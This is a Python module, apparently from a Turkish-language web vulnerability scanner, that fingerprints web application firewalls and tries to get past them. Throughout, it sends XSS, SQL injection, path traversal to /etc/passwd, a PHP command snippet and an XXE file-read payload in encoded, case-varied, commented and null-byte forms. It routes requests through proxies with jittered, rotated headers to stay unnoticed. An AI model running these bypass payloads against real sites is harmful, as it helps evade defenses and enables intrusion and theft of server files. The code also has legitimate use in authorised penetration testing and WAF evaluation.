"""
KAXIE Scanner - WAF Bypass Modülü
Web Application Firewall tespiti ve atlatma teknikleri
"""

import requests
import re
import random
import socket
import ssl
from urllib.parse import urljoin, urlparse, urlencode, parse_qs, quote, unquote
from config import SCAN_CONFIG, Colors
from utils.stealth import StealthManager


class WAFBypassScanner:
    """WAF tespiti ve çoklu atlatma (bypass) tekniklerini uygulayan sınıf."""

    def __init__(self, target, reporter, ai_engine=None):
        self.target = target
        self.reporter = reporter
        self.ai_engine = ai_engine
        self.stealth = StealthManager()
        self.session = requests.Session()
        self.session.verify = SCAN_CONFIG["verify_ssl"]
        self.waf_name = None
        self.waf_confidence = 0
        self.bypass_results = []

    def run(self):
        """Ana çalıştırıcı."""
        print(f"\n{Colors.CYAN}{'='*60}{Colors.RESET}")
        print(f"{Colors.CYAN}  [*] WAF TESPİTİ & BYPASS MODÜLÜ{Colors.RESET}")
        print(f"{Colors.CYAN}  [*] Hedef: {self.target}{Colors.RESET}")
        print(f"{Colors.CYAN}{'='*60}{Colors.RESET}")

        self._detect_waf()
        self._test_encoding_bypass()
        self._test_case_bypass()
        self._test_comment_bypass()
        self._test_null_byte_bypass()
        self._test_unicode_bypass()
        self._test_http_param_pollution()
        self._test_path_traversal_bypass()
        self._test_json_bypass()
        self._test_xml_bypass()

        if self.ai_engine and self.ai_engine.selected_model and self.bypass_results:
            print(f"\n{Colors.MAGENTA}  [*] AI WAF bypass analizi yapılıyor...{Colors.RESET}")
            for b in self.bypass_results:
                analysis = self.ai_engine.analyze_vulnerability(
                    vuln_type="WAF_BYPASS",
                    target=self.target,
                    evidence=b["evidence"],
                    response_snippet=b.get("response", ""),
                )
                if analysis:
                    self.reporter.add_ai_analysis("WAF_BYPASS", analysis)

        return self.bypass_results

    def _make_request(self, url, method="GET", data=None, headers=None, json_data=None):
        """Standart istek wrapper'ı."""
        if headers is None:
            headers = self.stealth.get_headers(self.target)
        self.stealth.jitter_delay()

        try:
            if method.upper() == "GET":
                resp = self.session.get(
                    url, headers=headers, timeout=SCAN_CONFIG["timeout"],
                    verify=False, allow_redirects=True, proxies=self.stealth.get_proxy(),
                )
            elif method.upper() == "POST" and json_data is not None:
                headers.setdefault("Content-Type", "application/json")
                resp = self.session.post(
                    url, json=json_data, headers=headers, timeout=SCAN_CONFIG["timeout"],
                    verify=False, allow_redirects=True, proxies=self.stealth.get_proxy(),
                )
            else:
                resp = self.session.request(
                    method, url, data=data, headers=headers, timeout=SCAN_CONFIG["timeout"],
                    verify=False, allow_redirects=True, proxies=self.stealth.get_proxy(),
                )
            self.reporter.scan_stats["total_requests"] += 1
            return resp
        except Exception:
            return None

    def _baseline_block(self):
        """WAF'ın blokladığı bir istek oluşturur ve yanıtı döndürür."""
        probe_url = f"{self.target}?kaxie_test=<script>alert(1)</script>"
        return self._make_request(probe_url)

    def _detect_waf(self):
        """WAF tespiti."""
        print(f"\n  {Colors.BLUE}[*] WAF tespiti yapılıyor...{Colors.RESET}")

        baseline = self._baseline_block()
        if not baseline:
            print(f"    {Colors.YELLOW}[-] Temel istek alınamadı{Colors.RESET}")
            return

        waf_db = {
            "Cloudflare": {
                "headers": ["cf-ray", "cf-cache-status", "server: cloudflare"],
                "body": ["Attention Required!", "Cloudflare Ray ID", "Checking your browser"],
                "status": [403, 503],
            },
            "AWS WAF / CloudFront": {
                "headers": ["x-amzn-requestid", "x-amz-cf-id", "x-amzn-errortype"],
                "body": ["Blocked", "AWS WAF", "Generated by cloudfront"],
                "status": [403],
            },
            "Akamai": {
                "headers": ["x-akamai-", "server: akamaighost"],
                "body": ["Access Denied", "AkamaiGHost", "Reference"],
                "status": [403, 501],
            },
            "Incapsula / Imperva": {
                "headers": ["x-iinfo", "x-cdn: Incapsula"],
                "body": ["incap_ses", "visid_incap", "_incapsula_"],
                "status": [403],
            },
            "Sucuri": {
                "headers": ["x-sucuri-id"],
                "body": ["Access Denied - Sucuri", "sucuri website firewall"],
                "status": [403],
            },
            "ModSecurity": {
                "headers": ["mod_security", "modsecurity"],
                "body": ["406 Not Acceptable", "Mod Security"],
                "status": [403, 406],
            },
            "F5 BIG-IP ASM": {
                "headers": ["x-wa-info", "server: bigip"],
                "body": ["The requested URL was rejected", "support ID"],
                "status": [403, 406],
            },
            "Barracuda": {
                "headers": ["barra_counter_session"],
                "body": ["You have been blocked", "Barracuda"],
                "status": [403],
            },
            "Fortinet FortiWeb": {
                "headers": ["fortiwafsid"],
                "body": ["FGT", "FortiWeb"],
                "status": [403],
            },
            "Wordfence": {
                "body": ["Generated by Wordfence", "wf_", "wordfence"],
                "status": [403],
            },
            "SafeDog": {
                "headers": ["x-powered-by: waf"],
                "body": ["safedog"],
                "status": [403],
            },
            "360WangZhanBao": {
                "headers": ["x-powered-by-360wzb"],
                "body": ["360"],
                "status": [403],
            },
            "Jiasule": {
                "headers": ["jsluid"],
                "body": ["jiasule"],
                "status": [403],
            },
            "DataDome": {
                "headers": ["x-datadome"],
                "body": ["datadome"],
                "status": [403],
            },
            "PerimeterX": {
                "headers": ["x-px-", "px-captcha"],
                "body": ["perimeterx", "px-captcha"],
                "status": [403],
            },
        }

        headers_str = " ".join(f"{k}: {v}" for k, v in baseline.headers.items()).lower()
        body_lower = baseline.text.lower()

        for name, sigs in waf_db.items():
            score = 0

            for h in sigs.get("headers", []):
                if h.lower() in headers_str:
                    score += 30

            for b in sigs.get("body", []):
                if b.lower() in body_lower:
                    score += 40

            if baseline.status_code in sigs.get("status", []):
                score += 20

            if score > self.waf_confidence:
                self.waf_confidence = score
                self.waf_name = name

        if self.waf_name and self.waf_confidence >= 40:
            print(f"    {Colors.YELLOW}[!] WAF TESPİT EDİLDİ: {self.waf_name} (Güven: {self.waf_confidence}%){Colors.RESET}")
            self.reporter.add_finding(
                vuln_type="INFO_DISCLOSURE",
                severity="INFO",
                title=f"WAF Tespiti: {self.waf_name}",
                description=f"Hedef {self.waf_name} Web Application Firewall tarafından korunuyor.",
                evidence=f"Confidence: {self.waf_confidence}%, Status: {baseline.status_code}",
                url=self.target,
            )
        else:
            print(f"    {Colors.GREEN}[+] Bilinen WAF tespit edilmedi (Status: {baseline.status_code}){Colors.RESET}")

    def _is_blocked(self, resp):
        """Yanıtın WAF tarafından bloklanıp bloklanmadığını kontrol eder."""
        if not resp:
            return True
        if resp.status_code in [403, 406, 501, 999]:
            return True
        blocked_phrases = [
            "blocked", "forbidden", "access denied", "not acceptable",
            "captcha", "security check", "attention required", "challenge",
        ]
        text = resp.text.lower()
        return any(p in text for p in blocked_phrases)

    def _register_bypass(self, title, description, payload, evidence, response_text=""):
        """Başarılı bypass'ı kaydeder."""
        self.reporter.add_finding(
            vuln_type="WAF_BYPASS",
            severity="HIGH",
            title=title,
            description=description,
            evidence=evidence,
            url=self.target,
        )
        self.bypass_results.append({
            "title": title,
            "payload": payload,
            "evidence": evidence,
            "response": response_text[:300],
        })
        print(f"    {Colors.RED}[!!!] BYPASS BAŞARILI: {title}{Colors.RESET}")

    def _test_encoding_bypass(self):
        """Çoklu encoding bypass testleri."""
        print(f"\n  {Colors.BLUE}[*] Encoding bypass testleri...{Colors.RESET}")

        base_payload = "<script>alert(1)</script>"
        variants = [
            ("URL-Encode", quote(base_payload, safe='')),
            ("Double-URL-Encode", quote(quote(base_payload, safe=''), safe='')),
            ("Partial-Encode", base_payload.replace("<", "%3C").replace(">", "%3E")),
            ("HTML-Entity", "&#60;script&#62;alert(1)&#60;/script&#62;"),
            ("Hex-Entity", "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;"),
            ("Mixed-Encode", "%3Cscript%3Ealert%281%29%3C%2Fscript%3E"),
            ("Unicode-Encode", "%u003Cscript%u003Ealert(1)%u003C/script%u003E"),
        ]

        for name, payload in variants:
            test_url = f"{self.target}?kaxie_test={payload}"
            resp = self._make_request(test_url)
            if resp and not self._is_blocked(resp):
                if payload.lower() in resp.text.lower() or base_payload.lower() in resp.text.lower():
                    self._register_bypass(
                        f"WAF Encoding Bypass ({name})",
                        f"{name} ile WAF filtresi atlatıldı.",
                        payload,
                        f"Variant: {name}, Status: {resp.status_code}",
                        resp.text,
                    )
                    return

    def _test_case_bypass(self):
        """Büyük/küçük harf varyasyonu bypass."""
        print(f"\n  {Colors.BLUE}[*] Case variation bypass testleri...{Colors.RESET}")

        payloads = [
            "<ScRiPt>alert(1)</ScRiPt>",
            "<sCrIpT>alert(1)</sCrIpT>",
            "SeLeCt * FrOm users",
            "UnIoN SeLeCt NuLl",
            "Or 1=1",
            "AnD 1=1",
        ]

        for payload in payloads:
            test_url = f"{self.target}?kaxie_test={quote(payload, safe='')}"
            resp = self._make_request(test_url)
            if resp and not self._is_blocked(resp):
                if payload.lower().replace(" ", "") in resp.text.lower().replace(" ", ""):
                    self._register_bypass(
                        "WAF Case Variation Bypass",
                        "WAF büyük/küçük harf duyarlılığı göstermiyor.",
                        payload,
                        f"Payload: {payload}",
                        resp.text,
                    )
                    return

    def _test_comment_bypass(self):
        """Yorum enjeksiyonu bypass."""
        print(f"\n  {Colors.BLUE}[*] Comment injection bypass testleri...{Colors.RESET}")

        payloads = [
            "S/**/ELECT * FROM users",
            "UNI/**/ON SELECT NULL",
            "<scr/**/ipt>alert(1)</scr/**/ipt>",
            "1'/**/OR/**/1=1",
            "1'/*!50000OR*/1=1",
            "1'/*!OR*/1=1",
            "S%0bELECT",
            "S%0dELECT",
            "S%0cELECT",
            "S%0eELECT",
            "S%0fELECT",
            "S%00ELECT",
        ]

        for payload in payloads:
            test_url = f"{self.target}?kaxie_test={quote(payload, safe='')}"
            resp = self._make_request(test_url)
            if resp and not self._is_blocked(resp):
                clean = payload.replace("/**/", "").replace("/*!50000", "").replace("/*!", "").replace("%0b", "").replace("%0d", "")
                if clean.lower() in resp.text.lower():
                    self._register_bypass(
                        "WAF Comment/Inline Bypass",
                        "SQL/JS yorumları veya inline boşluklar ile imza atlatıldı.",
                        payload,
                        f"Payload: {payload}",
                        resp.text,
                    )
                    return

    def _test_null_byte_bypass(self):
        """Null byte bypass."""
        print(f"\n  {Colors.BLUE}[*] Null byte bypass testleri...{Colors.RESET}")

        payloads = [
            "%00<script>alert(1)</script>",
            "<script>%00alert(1)</script>",
            "%00 UNION SELECT NULL",
            "1%00' OR 1=1",
            "../../../etc/passwd%00.jpg",
            "../../../etc/passwd%00.png",
            "%00<?php system('id'); ?>",
        ]

        for payload in payloads:
            test_url = f"{self.target}?kaxie_test={quote(payload, safe='')}"
            resp = self._make_request(test_url)
            if resp and not self._is_blocked(resp):
                self._register_bypass(
                    "WAF Null Byte Bypass",
                    "Null byte (%00) ile string sonlandırma / imza atlatma başarılı.",
                    payload,
                    f"Payload: {payload[:60]}",
                    resp.text,
                )
                return

    def _test_unicode_bypass(self):
        """Unicode/normalization bypass."""
        print(f"\n  {Colors.BLUE}[*] Unicode/normalization bypass testleri...{Colors.RESET}")

        payloads = [
            "%EF%BC%9Cscript%EF%BC%9Ealert(1)%EF%BC%9C/script%EF%BC%9E",
            "\u003cscript\u003ealert(1)\u003c/script\u003e",
            "\uff1cscript\uff1ealert(1)\uff1c/script\uff1e",
        ]

        for payload in payloads:
            test_url = f"{self.target}?kaxie_test={quote(payload, safe='')}"
            resp = self._make_request(test_url)
            if resp and not self._is_blocked(resp):
                if "script" in resp.text.lower() and "alert" in resp.text.lower():
                    self._register_bypass(
                        "WAF Unicode Normalization Bypass",
                        "Unicode karakterler normalizasyon sonrası filtreden kaçtı.",
                        payload,
                        f"Payload: {payload[:60]}",
                        resp.text,
                    )
                    return

    def _test_http_param_pollution(self):
        """HTTP Parameter Pollution (HPP) bypass."""
        print(f"\n  {Colors.BLUE}[*] HTTP Parameter Pollution testleri...{Colors.RESET}")

        parsed = urlparse(self.target)
        if not parsed.query:
            return

        params = parse_qs(parsed.query)
        if not params:
            return

        first_param = list(params.keys())[0]

        hpp_payloads = [
            f"{first_param}=safe&{first_param}=<script>alert(1)</script>",
            f"{first_param}=safe&{first_param}=' OR '1'='1",
            f"{first_param}[]=<script>alert(1)</script>",
            f"{first_param}[0]=safe&{first_param}[1]=<script>alert(1)</script>",
        ]

        for payload_str in hpp_payloads:
            test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{payload_str}"
            resp = self._make_request(test_url)
            if resp and not self._is_blocked(resp):
                if "script" in resp.text.lower() or "alert" in resp.text.lower():
                    self._register_bypass(
                        "WAF HTTP Parameter Pollution Bypass",
                        "Parametre çoğaltma / dizi gösterimi ile WAF atlatıldı.",
                        payload_str,
                        f"HPP: {payload_str[:80]}",
                        resp.text,
                    )
                    return

    def _test_path_traversal_bypass(self):
        """Path traversal WAF bypass."""
        print(f"\n  {Colors.BLUE}[*] Path traversal WAF bypass testleri...{Colors.RESET}")

        traversal_payloads = [
            "....//....//....//etc/passwd",
            "..%2F..%2F..%2Fetc%2Fpasswd",
            "..%252f..%252f..%252fetc%252fpasswd",
            "..%c0%af..%c0%af..%c0%afetc/passwd",
            "..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts",
            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
            "..././..././..././etc/passwd",
            "..%00/",
            "..%01/",
            "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
            "..////..////..////etc/passwd",
        ]

        for payload in traversal_payloads:
            test_url = f"{self.target}?file={quote(payload, safe='')}"
            resp = self._make_request(test_url)
            if resp:
                if re.search(r"root:x:0:0:", resp.text) or re.search(r"\[boot loader\]", resp.text):
                    self._register_bypass(
                        "WAF Path Traversal Bypass",
                        "Encoding varyasyonları ile path traversal filtresi atlatıldı.",
                        payload,
                        f"Payload: {payload}",
                        resp.text,
                    )
                    return

    def _test_json_bypass(self):
        """JSON içerik tipi bypass."""
        print(f"\n  {Colors.BLUE}[*] JSON content-type bypass testleri...{Colors.RESET}")

        json_payloads = [
            {"kaxie_test": "<script>alert(1)</script>"},
            {"kaxie_test": "' OR '1'='1"},
            {"kaxie_test": "../../../etc/passwd"},
            {"kaxie_test": "1 UNION SELECT NULL"},
        ]

        for payload in json_payloads:
            resp = self._make_request(self.target, method="POST", json_data=payload)
            if resp and not self._is_blocked(resp):
                test_val = str(payload["kaxie_test"]).lower()
                if test_val in resp.text.lower():
                    self._register_bypass(
                        "WAF JSON Content-Type Bypass",
                        "JSON body ile WAF imza kontrolü atlatıldı.",
                        str(payload),
                        f"JSON: {payload}",
                        resp.text,
                    )
                    return

    def _test_xml_bypass(self):
        """XML enjeksiyon / content-type bypass."""
        print(f"\n  {Colors.BLUE}[*] XML content-type bypass testleri...{Colors.RESET}")

        xml_payloads = [
            '<?xml version="1.0"?><test><kaxie>&lt;script&gt;alert(1)&lt;/script&gt;</kaxie></test>',
            '<?xml version="1.0"?><test><kaxie><![CDATA[<script>alert(1)</script>]]></kaxie></test>',
            '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>',
        ]

        headers = self.stealth.get_headers(self.target)
        headers["Content-Type"] = "application/xml"

        for payload in xml_payloads:
            resp = self._make_request(self.target, method="POST", data=payload, headers=headers)
            if resp and not self._is_blocked(resp):
                if "script" in resp.text.lower() or "root:" in resp.text.lower():
                    self._register_bypass(
                        "WAF XML Content-Type Bypass",
                        "XML/CDATA/XXE ile WAF atlatıldı.",
                        payload[:100],
                        "XML payload accepted",
                        resp.text,
                    )
                    return
